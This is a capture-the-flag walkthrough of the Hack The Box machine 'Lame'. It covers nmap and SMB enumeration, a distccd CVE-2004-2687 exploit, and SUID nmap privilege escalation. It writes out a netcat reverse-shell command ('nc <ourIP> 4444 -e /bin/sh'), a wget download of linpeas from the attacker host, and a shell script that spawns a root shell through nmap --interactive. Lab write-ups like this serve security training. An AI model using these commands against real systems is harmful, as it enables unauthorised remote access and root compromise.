HTB - Lame

Linux | distcc

Tools For This Room

  • Google

TL;DR / Executive Summary

  1. Scan and enumerate with nmap

  2. Gain foothold by exploiting distcc

  3. Privesc by exploiting nmap

Scanning & Enumeration

We'll kick off with an nmap scan. The box doesn't answer nmap's host-discovery probes, so we need "-Pn" to skip the ping and treat the host as up; without it nmap reports the host as down and scans nothing. Since version detection and default scripts across a large port range take a while, let's limit this first scan to the first 10,000 ports.

nmap -sV -sC -vv -Pn -p 1-10000 <IP>

In the background, let's run a second nmap scan on all ports (it needs "-Pn" too, for the same reason). This will reveal any ports beyond 10,000 while we work through the results of the first scan. "-T5" is fine against a lab box but trades accuracy for speed, so treat anything it misses with suspicion.

nmap -A -T5 -vv -Pn -p- <IP>

We get quite a few open ports from the first nmap scan:

  • 21/tcp: FTP
  • 22/tcp: SSH
  • 139/tcp: Samba smbd 3.x - 4.x
  • 445/tcp: Samba smbd 3.0.20-Debian
  • 3632/tcp: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Let's start by trying to log in to FTP anonymously (username "anonymous", any password):

ftp <IP>

We're in, but there doesn't seem to be anything here.

Next up is using nmap's SMB scripts to enumerate the Samba shares on port 445.

nmap --script=smb-enum* -p 445 -Pn <IP>

After a while, we get a lot of output. It looks like we have read/write access to 2 shares (IPC$, tmp).

We also find 2 user accounts which are not disabled: msfadmin and user (the latter's full-name field reads "just a user,111,,"). Lastly, the output hints that there could be MySQL and PostgreSQL servers on the box as well.

Let's see if we can find anything from the smb share:

smbclient //<IP>/IPC$
smbclient //<IP>/tmp

Unfortunately, we can't seem to access them.

We still have one unexplored option left, which is port 3632. Let's see what distccd v1 is and what it does:

"In software development, distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network." - Wikipedia

So distccd is simply the distcc daemon: it accepts compile jobs over the network and runs the compiler on them. A service that executes a compiler with arguments supplied by an unauthenticated client is worth a closer look, so let's see if there's any way to exploit this.

Gaining Foothold

A quick Google search for vulnerabilities gives us an NSE script, i.e. a script for the Nmap Scripting Engine. Nmap ships a large library of these, and we can write our own and add them to it.

The search result is the documentation page for a script that checks whether the vulnerability (CVE-2004-2687, a distccd started without an --allow restriction executing arbitrary commands) is present on the victim machine. So let's find that script on our attacking machine and verify that the distccd v1 on the victim is vulnerable.

locate distcc 2>/dev/null | grep nmap

Now let's run it and see:

nmap --script=distcc-cve2004-2687.nse -p 3632 <IP>

Looks like we've found our way in! Now let's find out how to exploit this. A search for the CVE turns up a proof of concept.

Checking out the GitHub repository by DarkCoderSc gives us a Python script. Let's copy it into a file (keeping its shebang line so it runs directly), make it executable, and run it.

gedit lame.py
chmod +x lame.py

It's always important to read through a script before running it, to understand what it's doing. In doing so we realize that it's written for pretty much this exact HTB box.

Now let's set up our netcat listener:

nc -lvnp 4444

And run our exploit:

./lame.py -t <victimIP> -p 3632 -c "nc <ourIP> 4444 -e /bin/sh"

We've got our shell.

Privilege Escalation

First things first, let's stabilize our shell so we get a proper TTY (tab completion, job control, and ctrl-c that doesn't kill the listener):

python -c 'import pty;pty.spawn("/bin/bash")'
(press ctrl + z to background the shell)
stty raw -echo && fg
export TERM=xterm

Now let's run our usual array of simple privesc checks (history, SUID binaries, sudo rights, etc.), but nothing quite pops up. Let's just run linpeas.

Set up a web server on our attacking machine (SimpleHTTPServer listens on port 8000 by default):

python -m SimpleHTTPServer

Transfer linpeas over, make it executable, and run it:

wget <ourIP>:<ourPort>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Scrolling through the results, we find an interesting highlight: linpeas flags the nmap binary and rates it at a 95% probability of being a privesc vector (the "exploiting nmap" step from the TL;DR).

Let's Google to see how we can abuse that.

Our first result gives us detailed steps on how to achieve this.
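The linpeas highlight and the steps from that search result are not reproduced on the page, so here is an added example (my own, not the author's steps) of the check I would run for the case the TL;DR points at: a root-owned SUID nmap old enough to still have --interactive. Nmap 2.02 through 5.21 ship that mode; its "!" prefix runs a shell command, and with the SUID bit set the spawned shell keeps an effective uid of 0. The binary path, the "Nmap version X.YZ" format of `nmap -V`, and the availability of GNU `stat -c` on the target are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page. Assumes the privesc vector is a
# root-owned SUID nmap with --interactive (present in nmap 2.02 .. 5.21).

nmap_version_has_interactive() {
    # $1 = first line of `nmap -V`, e.g. "Nmap version 4.53 ( http://insecure.org )"
    # Returns 0 when the version is inside the 2.02..5.21 range that has --interactive.
    ver=$(printf '%s\n' "$1" | sed -n 's/^[Nn]map version \([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    [ -n "$ver" ] || return 1
    major=${ver%%.*}
    minor=${ver#*.}
    [ ${#minor} -eq 1 ] && minor="${minor}0"   # "2.3" means 2.30
    minor=${minor#0}                            # "02" -> "2", avoids octal parsing
    num=$((major * 100 + minor))
    [ "$num" -ge 202 ] && [ "$num" -le 521 ]
}

suid_nmap_root_shell() {
    # $1 = path to the candidate binary (default: whatever nmap is on PATH).
    # A full SUID sweep first would be: find / -perm -4000 -type f 2>/dev/null
    bin=${1:-$(command -v nmap)}
    if [ -z "$bin" ] || [ ! -u "$bin" ]; then
        echo "no SUID nmap found"; return 1
    fi
    if [ "$(stat -c %U "$bin")" != root ]; then
        echo "$bin is SUID but not root-owned"; return 1
    fi
    if ! nmap_version_has_interactive "$("$bin" -V | head -n 1)"; then
        echo "$bin has no --interactive mode"; return 1
    fi
    echo "Starting $bin --interactive: type '!sh' at the nmap> prompt, then 'id' to confirm euid=0"
    "$bin" --interactive
}

# Usage on the target: suid_nmap_root_shell /usr/bin/nmap
```

The version gate matters: on a modern box an SUID nmap is still worth reporting, but --interactive is gone, so this particular route will not work and a different technique is needed.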

A minute later, we are root!

Let's grab that flag and call it a day.
